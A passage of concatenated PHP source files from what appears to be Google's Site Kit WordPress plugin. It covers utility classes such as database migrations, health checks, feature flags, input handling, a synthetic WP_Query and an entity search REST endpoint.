Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Modules\Sign_In_With_Google\Settings as Sign_In_With_Google_Settings; /** * Class Migration_1_163_0 * * @since 1.163.0 * @access private * @ignore */ class Migration_1_163_0 { /** * Target DB version. */ const DB_VERSION = '1.163.0'; /** * DB version option name. */ const DB_VERSION_OPTION = 'googlesitekit_db_version'; /** * Context instance. * * @since 1.163.0 * @var Context */ protected $context; /** * Options instance. * * @since 1.163.0 * @var Options */ protected $options; /** * Sign_In_With_Google_Settings instance. * * @since 1.163.0 * @var Sign_In_With_Google_Settings */ protected $sign_in_with_google_settings; /** * Constructor. * * @since 1.163.0 * * @param Context $context Plugin context instance. * @param Options $options Optional. Options instance. */ public function __construct( Context $context, ?Options $options = null ) { $this->context = $context; $this->options = $options ?: new Options( $context ); $this->sign_in_with_google_settings = new Sign_In_With_Google_Settings( $this->options ); } /** * Registers hooks. * * @since 1.163.0 */ public function register() { add_action( 'admin_init', array( $this, 'migrate' ) ); } /** * Migrates the DB. * * @since 1.163.0 */ public function migrate() { $db_version = $this->options->get( self::DB_VERSION_OPTION ); if ( ! $db_version || version_compare( $db_version, self::DB_VERSION, '<' ) ) { $this->migrate_one_tap_enabled_setting(); $this->options->set( self::DB_VERSION_OPTION, self::DB_VERSION ); } } /** * Migrates the One Tap Setting to the most conservative value based * on previous user settings. * * Given the new setting is equivalent to the old setting of * "One Tap on all pages", we only set One Tap to be enabled if * the no-longer-used "One Tap on all pages" setting was set to true. * * @since 1.163.0 */ protected function migrate_one_tap_enabled_setting() { if ( ! $this->sign_in_with_google_settings->has() ) { return; } $sign_in_with_google_settings = $this->sign_in_with_google_settings->get(); if ( ! is_array( $sign_in_with_google_settings ) || empty( $sign_in_with_google_settings ) ) { return; } if ( array_key_exists( 'oneTapOnAllPages', $sign_in_with_google_settings ) && true === $sign_in_with_google_settings['oneTapOnAllPages'] ) { $sign_in_with_google_settings['oneTapEnabled'] = true; } else { $sign_in_with_google_settings['oneTapEnabled'] = false; } unset( $sign_in_with_google_settings['oneTapOnAllPages'] ); // Save the updated settings. $this->sign_in_with_google_settings->set( $sign_in_with_google_settings ); } } <?php /** * Class Google\Site_Kit\Core\Util\Activation_Notice * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Admin\Notice; use Google\Site_Kit\Core\Assets\Assets; use Google\Site_Kit\Core\Util\Requires_Javascript_Trait; /** * Class handling plugin activation. * * @since 1.10.0 Renamed from Activation. * @access private * @ignore */ final class Activation_Notice { use Requires_Javascript_Trait; /** * Plugin context. * * @since 1.10.0 * @var Context */ private $context; /** * Activation flag instance. * * @since 1.10.0 * @var Activation_Flag */ protected $activation_flag; /** * Assets API instance. * * @since 1.10.0 * @var Assets */ protected $assets; /** * Constructor. * * @since 1.10.0 * * @param Context $context Plugin context. * @param Activation_Flag $activation_flag Activation flag instance. * @param Assets $assets Optional. The Assets API instance. Default is a new instance. */ public function __construct( Context $context, Activation_Flag $activation_flag, ?Assets $assets = null ) { $this->context = $context; $this->activation_flag = $activation_flag; $this->assets = $assets ?: new Assets( $this->context ); } /** * Registers functionality through WordPress hooks. * * @since 1.10.0 */ public function register() { add_filter( 'googlesitekit_admin_notices', function ( $notices ) { $notices[] = $this->get_activation_notice(); return $notices; } ); add_action( 'admin_enqueue_scripts', function ( $hook_suffix ) { if ( 'plugins.php' !== $hook_suffix || ! $this->activation_flag->get_activation_flag( is_network_admin() ) ) { return; } /** * Prevent the default WordPress "Plugin Activated" notice from rendering. * * @link https://github.com/WordPress/WordPress/blob/e1996633228749cdc2d92bc04cc535d45367bfa4/wp-admin/plugins.php#L569-L570 */ unset( $_GET['activate'] ); // phpcs:ignore WordPress.Security.NonceVerification, WordPress.VIP.SuperGlobalInputUsage $this->assets->enqueue_asset( 'googlesitekit-admin-css' ); $this->assets->enqueue_asset( 'googlesitekit-activation' ); } ); } /** * Gets the admin notice indicating that the plugin has just been activated. * * @since 1.10.0 * * @return Notice Admin notice instance. */ private function get_activation_notice() { return new Notice( 'activated', array( 'content' => function () { ob_start(); ?> <div class="googlesitekit-plugin"> <?php $this->render_noscript_html(); ?> <div id="js-googlesitekit-activation" class="googlesitekit-activation googlesitekit-activation--loading"> <div class="googlesitekit-activation__loading"> <div role="progressbar" class="mdc-linear-progress mdc-linear-progress--indeterminate"> <div class="mdc-linear-progress__buffering-dots"></div> <div class="mdc-linear-progress__buffer"></div> <div class="mdc-linear-progress__bar mdc-linear-progress__primary-bar"> <span class="mdc-linear-progress__bar-inner"></span> </div> <div class="mdc-linear-progress__bar mdc-linear-progress__secondary-bar"> <span class="mdc-linear-progress__bar-inner"></span> </div> </div> </div> </div> </div> <?php return ob_get_clean(); }, 'type' => Notice::TYPE_SUCCESS, 'active_callback' => function ( $hook_suffix ) { if ( 'plugins.php' !== $hook_suffix ) { return false; } $network_wide = is_network_admin(); $flag = $this->activation_flag->get_activation_flag( $network_wide ); if ( $flag ) { // Unset the flag so that the notice only shows once. $this->activation_flag->delete_activation_flag( $network_wide ); } return $flag; }, 'dismissible' => true, ) ); } } <?php /** * Class Google\Site_Kit\Core\Util\Health_Checks * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Exception; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole as Google_Service_SearchConsole; use Google\Site_Kit_Dependencies\Google_Service_Exception; use WP_REST_Server; /** * Class for performing health checks. * * @since 1.14.0 * @access private * @ignore */ class Health_Checks { /** * Authentication instance. * * @var Authentication */ protected $authentication; /** * Google_Proxy instance. * * @var Google_Proxy */ protected $google_proxy; /** * Constructor. * * @param Authentication $authentication Authentication instance. */ public function __construct( Authentication $authentication ) { $this->authentication = $authentication; $this->google_proxy = $authentication->get_google_proxy(); } /** * Registers functionality through WordPress hooks. * * @since 1.14.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $rest_routes ) { $health_check_routes = $this->get_rest_routes(); return array_merge( $rest_routes, $health_check_routes ); } ); } /** * Gets all health check REST routes. * * @since 1.14.0 * * @return REST_Route[] List of REST_Route objects. */ private function get_rest_routes() { return array( new REST_Route( 'core/site/data/health-checks', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { $checks = array( 'googleAPI' => $this->check_google_api(), 'skService' => $this->check_service_connectivity(), ); return compact( 'checks' ); }, 'permission_callback' => function () { return current_user_can( Permissions::VIEW_SHARED_DASHBOARD ) || current_user_can( Permissions::SETUP ); }, ), ) ), ); } /** * Checks connection to Google APIs. * * @since 1.14.0 * * @return array Results data. */ private function check_google_api() { $client = $this->authentication->get_oauth_client()->get_client(); $restore_defer = $client->withDefer( false ); $error_msg = ''; // Make a request to the Search API. // This request is bound to fail but this is okay as long as the error response comes // from a Google API endpoint (Google_Service_exception). The test is only intended // to check that the server is capable of connecting to the Google API (at all) // regardless of valid authentication, which will likely be missing here. try { ( new Google_Service_SearchConsole( $client ) )->sites->listSites(); $pass = true; } catch ( Google_Service_Exception $e ) { if ( ! empty( $e->getErrors() ) ) { $pass = true; } else { $pass = false; $error_msg = $e->getMessage(); } } catch ( Exception $e ) { $pass = false; $error_msg = $e->getMessage(); } $restore_defer(); return array( 'pass' => $pass, 'errorMsg' => $error_msg, ); } /** * Checks connection to Site Kit service. * * @since 1.85.0 * * @return array Results data. */ private function check_service_connectivity() { $service_url = $this->google_proxy->url(); $response = wp_remote_head( $service_url ); if ( is_wp_error( $response ) ) { return array( 'pass' => false, 'errorMsg' => $response->get_error_message(), ); } $status_code = wp_remote_retrieve_response_code( $response ); $pass = is_int( $status_code ) && $status_code < 400; return array( 'pass' => $pass, 'errorMsg' => $pass ? '' : 'connection_fail', ); } } <?php /** * Trait Google\Site_Kit\Core\Util\WP_Context_Switcher_Trait * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Trait for temporarily switching WordPress context, e.g. from admin to frontend. * * @since 1.16.0 * @access private * @ignore */ trait WP_Context_Switcher_Trait { /** * Switches to WordPress frontend context if necessary. * * Context is only switched if WordPress is not already in frontend context. Context should only ever be switched * temporarily. Call the returned closure as soon as possible after to restore the original context. * * @since 1.16.0 * * @return callable Closure that restores context. */ protected static function with_frontend_context() { $restore = self::get_restore_current_screen_closure(); if ( ! is_admin() ) { return $restore; } self::switch_current_screen( 'front' ); return $restore; } /** * Switches the current WordPress screen via the given screen ID or hook name. * * @since 1.16.0 * * @param string $screen_id WordPress screen ID. */ private static function switch_current_screen( $screen_id ) { global $current_screen; require_once ABSPATH . 'wp-admin/includes/class-wp-screen.php'; require_once ABSPATH . 'wp-admin/includes/screen.php'; $current_screen = \WP_Screen::get( $screen_id ); // phpcs:ignore WordPress.WP.GlobalVariablesOverride.Prohibited } /** * Returns the closure to restore the current screen. * * Calling the closure will restore the `$current_screen` global to what it was set to at the time of calling * this method. * * @since 1.16.0 * * @return callable Closure that restores context. */ private static function get_restore_current_screen_closure() { global $current_screen; $original_screen = $current_screen; return static function () use ( $original_screen ) { global $current_screen; $current_screen = $original_screen; // phpcs:ignore WordPress.WP.GlobalVariablesOverride.Prohibited }; } } <?php /** * Class Google\Site_Kit\Core\Util\Method_Proxy_Trait * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; trait Method_Proxy_Trait { /** * Gets a proxy function for a class method. * * @since 1.17.0 * * @param string $method Method name. * @return callable A proxy function. */ private function get_method_proxy( $method ) { return function ( ...$args ) use ( $method ) { return $this->{ $method }( ...$args ); }; } /** * Gets a proxy function for a class method which can be executed only once. * * @since 1.24.0 * * @param string $method Method name. * @return callable A proxy function. */ private function get_method_proxy_once( $method ) { return function ( ...$args ) use ( $method ) { static $called; static $return_value; if ( ! $called ) { $called = true; $return_value = $this->{ $method }( ...$args ); } return $return_value; }; } } <?php /** * Class Google\Site_Kit\Core\Util\Synthetic_WP_Query * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use WP_Query; use WP_Post; /** * Class extending WordPress core's `WP_Query` for more self-contained behavior. * * @since 1.16.0 * @access private * @ignore */ final class Synthetic_WP_Query extends WP_Query { /** * The hash of the `$query` last parsed into `$query_vars`. * * @since 1.16.0 * @var string */ private $parsed_query_hash = ''; /** * Whether automatic 404 detection in `get_posts()` method is enabled. * * @since 1.16.0 * @var bool */ private $enable_404_detection = false; /** * Sets whether 404 detection in `get_posts()` method should be enabled. * * @since 1.16.0 * * @param bool $enable Whether or not to enable 404 detection. */ public function enable_404_detection( $enable ) { $this->enable_404_detection = (bool) $enable; } /** * Initiates object properties and sets default values. * * @since 1.16.0 */ public function init() { parent::init(); $this->parsed_query_hash = ''; } /** * Extends `WP_Query::parse_query()` to ensure it is not unnecessarily run twice. * * @since 1.16.0 * * @param string|array $query Optional. Array or string of query parameters. See `WP_Query::parse_query()`. */ public function parse_query( $query = '' ) { if ( ! empty( $query ) ) { $query_to_hash = wp_parse_args( $query ); } elseif ( ! isset( $this->query ) ) { $query_to_hash = $this->query_vars; } else { $query_to_hash = $this->query; } // phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.serialize_serialize $query_hash = md5( serialize( $query_to_hash ) ); // If this query was parsed before, bail early. if ( $query_hash === $this->parsed_query_hash ) { return; } parent::parse_query( $query ); // Set query hash for current `$query` and `$query_vars` properties. $this->parsed_query_hash = $query_hash; } /** * Extends `WP_Query::get_posts()` to include supplemental logic such as detecting a 404 state. * * The majority of the code is a copy of `WP::handle_404()`. * * @since 1.16.0 * * @return WP_Post[]|int[] Array of post objects or post IDs. */ public function get_posts() { $results = parent::get_posts(); // If 404 detection is not enabled, just return the results. if ( ! $this->enable_404_detection ) { return $results; } // Check if this is a single paginated post query. if ( $this->posts && $this->is_singular() && $this->post && ! empty( $this->query_vars['page'] ) ) { // If the post is actually paged and the 'page' query var is within bounds, it's all good. $next = '<!--nextpage-->'; if ( false !== strpos( $this->post->post_content, $next ) && (int) trim( $this->query_vars['page'], '/' ) <= ( substr_count( $this->post->post_content, $next ) + 1 ) ) { return $results; } // Otherwise, this query is out of bounds, so set a 404. $this->set_404(); return $results; } // If no posts were found, this is technically a 404. if ( ! $this->posts ) { // If this is a paginated query (i.e. out of bounds), always consider it a 404. if ( $this->is_paged() ) { $this->set_404(); return $results; } // If this is an author archive, don't consider it a 404 if the author exists. if ( $this->is_author() ) { $author = $this->get( 'author' ); if ( is_numeric( $author ) && $author > 0 && is_user_member_of_blog( $author ) ) { return $results; } } // If this is a valid taxonomy or post type archive, don't consider it a 404. if ( ( $this->is_category() || $this->is_tag() || $this->is_tax() || $this->is_post_type_archive() ) && $this->get_queried_object() ) { return $results; } // If this is a search results page or the home index, don't consider it a 404. if ( $this->is_home() || $this->is_search() ) { return $results; } // Otherwise, set a 404. $this->set_404(); } return $results; } } <?php /** * Class Google\Site_Kit\Core\Util\Input * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Class for input superglobal access. * * @since 1.1.2 * @access private * @ignore */ class Input { /** * Map of input type to superglobal array. * * For use as fallback only. * * @since 1.1.4 * @var array */ protected $fallback_map; /** * Constructor. * * @since 1.1.4 */ public function __construct() { // Fallback map for environments where filter_input may not work with ENV or SERVER types. $this->fallback_map = array( INPUT_ENV => $_ENV, INPUT_SERVER => $_SERVER, // phpcs:ignore WordPress.VIP.SuperGlobalInputUsage ); } /** * Gets a specific external variable by name and optionally filters it. * * @since 1.1.2 * @since 1.92.0 Changed default value of $options parameter to 0. * * @link https://php.net/manual/en/function.filter-input.php * * @param int $type One of INPUT_GET, INPUT_POST, INPUT_COOKIE, INPUT_SERVER, or INPUT_ENV. * @param string $variable_name Name of a variable to get. * @param int $filter [optional] The ID of the filter to apply. The manual page lists the available filters. * @param mixed $options [optional] Associative array of options or bitwise disjunction of flags. * If filter accepts options, flags can be provided in "flags" field of array. * @return mixed Value of the requested variable on success, * FALSE if the filter fails, * NULL if the $variable_name variable is not set. * * If the flag FILTER_NULL_ON_FAILURE is used, it returns FALSE if the variable is not set * and NULL if the filter fails. */ public function filter( $type, $variable_name, $filter = FILTER_DEFAULT, $options = 0 ) { $value = filter_input( $type, $variable_name, $filter, $options ); // Fallback for environments where filter_input may not work with specific types. if ( // Only use this fallback for affected input types. isset( $this->fallback_map[ $type ] ) // Only use the fallback if the value is not-set (could be either depending on FILTER_NULL_ON_FAILURE). && in_array( $value, array( null, false ), true ) // Only use the fallback if the key exists in the input map. && array_key_exists( $variable_name, $this->fallback_map[ $type ] ) ) { return filter_var( $this->fallback_map[ $type ][ $variable_name ], $filter, $options ); } return $value; } } <?php /** * Class Google\Site_Kit\Core\Util\Feature_Flags * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use ArrayAccess; /** * Class for interacting with feature flag configuration. * * @since 1.22.0 * @access private * @ignore */ class Feature_Flags { /** * Feature flag definitions. * * @since 1.22.0 * @var array|ArrayAccess */ private static $features = array(); /** * Checks if the given feature is enabled. * * @since 1.22.0 * * @param string $feature Feature key path to check. * @return bool */ public static function enabled( $feature ) { if ( ! $feature || ! is_string( $feature ) || empty( static::$features ) ) { return false; } /** * Filters a feature flag's status (on or off). * * Mainly this is used by E2E tests to allow certain features to be disabled or * enabled for testing, but is also useful to switch features on/off on-the-fly. * * @since 1.25.0 * * @param bool $feature_enabled The current status of this feature flag (`true` or `false`). * @param string $feature The feature name. */ return apply_filters( 'googlesitekit_is_feature_enabled', false, $feature ); } /** * Gets all enabled feature flags. * * @since 1.25.0 * * @return string[] An array of all enabled features. */ public static function get_enabled_features() { $enabled_features = array(); foreach ( static::$features as $feature_name ) { if ( static::enabled( $feature_name ) ) { $enabled_features[] = $feature_name; } } return $enabled_features; } /** * Sets the feature configuration. * * @since 1.22.0 * * @param array|ArrayAccess $features Feature configuration. */ public static function set_features( $features ) { if ( is_array( $features ) || $features instanceof ArrayAccess ) { static::$features = $features; } } /** * Gets all available feature flags. * * @since 1.26.0 * * @return array An array of all available features. */ public static function get_available_features() { return static::$features; } } <?php /** * Class Google\Site_Kit\Core\Util\REST_Entity_Search_Controller * * @package Google\Site_Kit\Core\Util * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use WP_REST_Server; use WP_REST_Request; use WP_REST_Response; /** * Class for handling entity search REST routes. * * @since 1.68.0 * @access private * @ignore */ class REST_Entity_Search_Controller { /** * Plugin context. * * @since 1.68.0 * @var Context */ private $context; /** * Constructor. * * @since 1.68.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Registers functionality through WordPress hooks. * * @since 1.68.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); } /** * Gets REST route instances. * * @since 1.68.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_search = function () { return current_user_can( Permissions::AUTHENTICATE ) || current_user_can( Permissions::VIEW_SHARED_DASHBOARD ); }; return array( new REST_Route( 'core/search/data/entity-search', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function ( WP_REST_Request $request ) { $query = rawurldecode( $request['query'] ); $entities = array(); if ( filter_var( $query, FILTER_VALIDATE_URL ) ) { $entity = $this->context->get_reference_entity_from_url( $query ); if ( $entity && $entity->get_id() ) { $entities = array( array( 'id' => $entity->get_id(), 'title' => $entity->get_title(), 'url' => $entity->get_url(), 'type' => $entity->get_type(), ), ); } } else { $args = array( 'posts_per_page' => 10, 'google-site-kit' => 1, 's' => $query, 'no_found_rows' => true, 'update_post_meta_cache' => false, 'update_post_term_cache' => false, 'post_status' => array( 'publish' ), ); $posts = ( new \WP_Query( $args ) )->posts; if ( ! empty( $posts ) ) { $entities = array_map( function ( $post ) { $entity = Entity_Factory::create_entity_for_post( $post, 1 ); return array( 'id' => $entity->get_id(), 'title' => $entity->get_title(), 'url' => $entity->get_url(), 'type' => $entity->get_type(), ); }, $posts ); } } return new WP_REST_Response( $entities ); }, 'permission_callback' => $can_search, ), ), array( 'args' => array( 'query' => array( 'type' => 'string', 'description' => __( 'Text content to search for.', 'google-site-kit' ), 'required' => true, ), ), ) ), ); } } <?php /** * Trait Google\Site_Kit\Core\Util\Requires_Javascript_Trait * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Trait to display no javascript fallback message. * * @since 1.5.0 * @access private * @ignore */ trait Requires_Javascript_Trait { /** * Outputs a fallback message when Javascript is disabled. * * @since 1.5.0 */ protected function render_noscript_html() { ?> <noscript> <div class="googlesitekit-noscript notice notice-warning"> <div class="mdc-layout-grid"> <div class="mdc-layout-grid__inner"> <div class="mdc-layout-grid__cell mdc-layout-grid__cell--span-12"> <p class="googlesitekit-noscript__text"> <?php esc_html_e( 'The Site Kit by Google plugin requires JavaScript to be enabled in your browser.', 'google-site-kit' ) ?> </p> </div> </div> </div> </div> </noscript> <?php } } <?php /** * Migration for 1.8.1 * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\Authentication\Google_Proxy; use Google\Site_Kit\Core\Authentication\Profile; use Google\Site_Kit\Core\Authentication\Verification_File; use Google\Site_Kit\Core\Authentication\Verification_Meta; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\User_Options; use WP_User; use WP_Error; /** * Class Migration_1_8_1 * * @since 1.8.1 * @access private * @ignore */ class Migration_1_8_1 { /** * Target DB version. */ const DB_VERSION = '1.8.1'; /** * Context instance. * * @since 1.8.1 * @var Context */ protected $context; /** * Options instance. * * @since 1.8.1 * @var Options */ protected $options; /** * User_Options instance. * * @since 1.8.1 * @var User_Options */ protected $user_options; /** * Authentication instance. * * @since 1.8.1 * @var Authentication */ protected $authentication; /** * Constructor. * * @since 1.8.1 * * @param Context $context Plugin context instance. * @param Options $options Optional. Options instance. * @param User_Options $user_options Optional. User_Options instance. * @param Authentication $authentication Optional. Authentication instance. Default is a new instance. */ public function __construct( Context $context, ?Options $options = null, ?User_Options $user_options = null, ?Authentication $authentication = null ) { $this->context = $context; $this->options = $options ?: new Options( $this->context ); $this->user_options = $user_options ?: new User_Options( $this->context ); $this->authentication = $authentication ?: new Authentication( $this->context, $this->options, $this->user_options ); } /** * Registers hooks. * * @since 1.8.1 */ public function register() { add_action( 'admin_init', array( $this, 'migrate' ) ); } /** * Migrates the DB. * * @since 1.8.1 */ public function migrate() { $db_version = $this->options->get( 'googlesitekit_db_version' ); // Do not run if database version already updated. if ( $db_version && version_compare( $db_version, self::DB_VERSION, '>=' ) ) { return; } // Only run routine if using the authentication service, otherwise it // is irrelevant. if ( ! $this->authentication->credentials()->using_proxy() ) { return; } // Only run routine once site credentials present, otherwise it is not // possible to connect to the authentication service. if ( ! $this->authentication->credentials()->has() ) { return; } $this->clear_and_flag_unauthorized_verified_users(); // Update database version. $this->options->set( 'googlesitekit_db_version', self::DB_VERSION ); } /** * Checks whether there are any users that are verified without proper * authorization, clear their Site Kit data, and flag them on the * authentication service. * * @since 1.8.1 * * @return boolean|WP_Error True on success, WP_Error on failure. */ private function clear_and_flag_unauthorized_verified_users() { // Detect all unauthorized verified users and clean their Site Kit data. $unauthorized_identifiers = $this->clear_unauthorized_verified_users(); // If no unauthorized verified users found, all is well, no need to // show a notification. if ( empty( $unauthorized_identifiers ) ) { return true; } // Flag site as affected so that the notification to inform and explain // steps to resolve will be shown. $credentials = $this->authentication->credentials()->get(); $google_proxy = new Google_Proxy( $this->context ); $response = wp_remote_post( $google_proxy->url( '/notifications/mark/' ), array( 'body' => array( 'site_id' => $credentials['oauth2_client_id'], 'site_secret' => $credentials['oauth2_client_secret'], 'notification_id' => 'verification_leak', 'notification_state' => 'required', // This is a special parameter only supported for this // particular notification. 'identifiers' => implode( ',', $unauthorized_identifiers ), ), ) ); if ( is_wp_error( $response ) ) { return $response; } $response_code = wp_remote_retrieve_response_code( $response ); if ( 200 !== $response_code ) { $body = wp_remote_retrieve_body( $response ); $decoded = json_decode( $body, true ); return new WP_Error( $response_code, ! empty( $decoded['error'] ) ? $decoded['error'] : $body ); } return true; } /** * Checks for any users that are verified without proper authorization and * clears all their Site Kit data. * * @since 1.8.1 * * @return array List of email addresses for the unauthorized users. */ private function clear_unauthorized_verified_users() { global $wpdb; $unauthorized_identifiers = array(); $profile = new Profile( $this->user_options ); // Store original user ID to switch back later. $backup_user_id = $this->user_options->get_user_id(); // Iterate through all users verified via Site Kit. foreach ( $this->get_verified_user_ids() as $user_id ) { $this->user_options->switch_user( $user_id ); // If the user has setup access, there is no problem. if ( user_can( $user_id, Permissions::SETUP ) ) { continue; } // Try to get profile email, otherwise fall back to WP email. if ( $this->authentication->profile()->has() ) { $unauthorized_identifiers[] = $this->authentication->profile()->get()['email']; } else { $user = get_user_by( 'id', $user_id ); $unauthorized_identifiers[] = $user->user_email; } $prefix = $this->user_options->get_meta_key( 'googlesitekit\_%' ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery $wpdb->query( $wpdb->prepare( "DELETE FROM $wpdb->usermeta WHERE user_id = %d AND meta_key LIKE %s", $user_id, $prefix ) ); wp_cache_delete( $user_id, 'user_meta' ); } // Restore original user ID. $this->user_options->switch_user( $backup_user_id ); return $unauthorized_identifiers; } /** * Gets all user IDs that are verified via Site Kit. * * @since @1.31.0 * * @return array List of user ids of verified users. Maximum of 20. */ private function get_verified_user_ids() { global $wpdb; // phpcs:ignore WordPress.DB.DirectDatabaseQuery return $wpdb->get_col( $wpdb->prepare( "SELECT user_id FROM $wpdb->usermeta WHERE meta_key IN (%s, %s) LIMIT 20", $this->user_options->get_meta_key( Verification_File::OPTION ), $this->user_options->get_meta_key( Verification_Meta::OPTION ) ) ); } } <?php /** * Migration for 1.123.0 * * @package Google\Site_Kit\Core\Util * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Modules\Module_Sharing_Settings; use Google\Site_Kit\Core\Modules\Modules; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Modules\Analytics_4; use Google\Site_Kit\Modules\Analytics_4\Settings as Analytics_Settings; /** * Class Migration_1_123_0 * * @since 1.123.0 * @access private * @ignore */ class Migration_1_123_0 { /** * Target DB version. */ const DB_VERSION = '1.123.0'; /** * DB version option name. */ const DB_VERSION_OPTION = 'googlesitekit_db_version'; /** * Legacy analytics module slug. */ const LEGACY_ANALYTICS_MODULE_SLUG = 'analytics'; /** * Legacy analytics option name. */ const LEGACY_ANALYTICS_OPTION = 'googlesitekit_analytics_settings'; /** * Context instance. * * @since 1.123.0 * @var Context */ protected $context; /** * Options instance. * * @since 1.123.0 * @var Options */ protected $options; /** * Analytics_Settings instance. * * @since 1.123.0 * @var Analytics_Settings */ protected $analytics_settings; /** * Constructor. * * @since 1.123.0 * * @param Context $context Plugin context instance. * @param Options $options Optional. Options instance. */ public function __construct( Context $context, ?Options $options = null ) { $this->context = $context; $this->options = $options ?: new Options( $context ); $this->analytics_settings = new Analytics_Settings( $this->options ); } /** * Registers hooks. * * @since 1.123.0 */ public function register() { add_action( 'admin_init', array( $this, 'migrate' ) ); } /** * Migrates the DB. * * @since 1.123.0 */ public function migrate() { $db_version = $this->options->get( self::DB_VERSION_OPTION ); if ( ! $db_version || version_compare( $db_version, self::DB_VERSION, '<' ) ) { $this->migrate_legacy_analytics_settings(); $this->activate_analytics(); $this->migrate_legacy_analytics_sharing_settings(); $this->options->set( self::DB_VERSION_OPTION, self::DB_VERSION ); } } /** * Migrates the legacy analytics settings over to analytics-4. * * @since 1.123.0 */ protected function migrate_legacy_analytics_settings() { if ( ! $this->analytics_settings->has() ) { return; } $legacy_settings = $this->options->get( self::LEGACY_ANALYTICS_OPTION ); if ( empty( $legacy_settings ) ) { return; } $recovered_settings = array(); $options_to_migrate = array( 'accountID', 'adsConversionID', 'trackingDisabled', ); array_walk( $options_to_migrate, function ( $setting ) use ( &$recovered_settings, $legacy_settings ) { $recovered_settings[ $setting ] = $legacy_settings[ $setting ]; } ); if ( ! empty( $recovered_settings ) ) { $this->analytics_settings->merge( $recovered_settings ); } } /** * Activates the analytics-4 module if the legacy analytics module was active. * * @since 1.123.0 */ protected function activate_analytics() { $option = $this->options->get( Modules::OPTION_ACTIVE_MODULES ); // Check legacy option. if ( ! is_array( $option ) ) { $option = $this->options->get( 'googlesitekit-active-modules' ); } if ( ! is_array( $option ) ) { return; } $analytics_active = in_array( Analytics_4::MODULE_SLUG, $option, true ); // If analytics-4 is already active, bail. if ( $analytics_active ) { return; } $legacy_analytics_active = in_array( self::LEGACY_ANALYTICS_MODULE_SLUG, $option, true ); if ( $legacy_analytics_active ) { $option[] = Analytics_4::MODULE_SLUG; $this->options->set( Modules::OPTION_ACTIVE_MODULES, $option ); } } /** * Replicates sharing settings from the legacy analytics module to analytics-4. * * @since 1.123.0 */ protected function migrate_legacy_analytics_sharing_settings() { $option = $this->options->get( Module_Sharing_Settings::OPTION ); if ( ! is_array( $option ) ) { return; } // If sharing settings for analytics-4 already exist, bail. if ( isset( $option[ Analytics_4::MODULE_SLUG ] ) ) { return; } if ( isset( $option[ self::LEGACY_ANALYTICS_MODULE_SLUG ] ) ) { $option[ Analytics_4::MODULE_SLUG ] = $option[ self::LEGACY_ANALYTICS_MODULE_SLUG ]; $this->options->set( Module_Sharing_Settings::OPTION, $option ); } } } <?php /** * Class Google\Site_Kit\Core\Util\URL * * @package Google\Site_Kit\Core\Util * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Class for custom URL parsing methods. * * @since 1.84.0 * @access private * @ignore */ class URL { /** * Prefix for Punycode-encoded hostnames. */ const PUNYCODE_PREFIX = 'xn--'; /** * Parses URLs with UTF-8 multi-byte characters, * otherwise similar to `wp_parse_url()`. * * @since 1.84.0 * * @param 